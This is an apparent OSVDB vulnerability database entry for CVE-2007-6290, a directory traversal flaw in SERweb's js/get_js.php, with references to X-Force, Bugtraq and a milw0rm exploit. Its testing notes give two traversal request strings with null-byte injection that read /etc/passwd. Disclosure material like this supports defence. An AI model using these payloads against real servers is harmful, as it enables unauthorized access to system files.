SERweb js/get_js.php Multiple Variable Traversal Arbitrary File Access

2007-12-06T00:00:00
ID OSVDB:39220
Type osvdb
Reporter OSVDB
Modified 2007-12-06T00:00:00

Description

Manual Testing Notes

/js/get_js.php?mod=../../../../../../../etc/passwd%00 /js/get_js.php?js=../../../../../../../etc/passwd%00

References:

ISS X-Force ID: 38907 Generic Exploit URL: http://www.milw0rm.com/exploits/4696 CVE-2007-6290 Bugtraq ID: 26747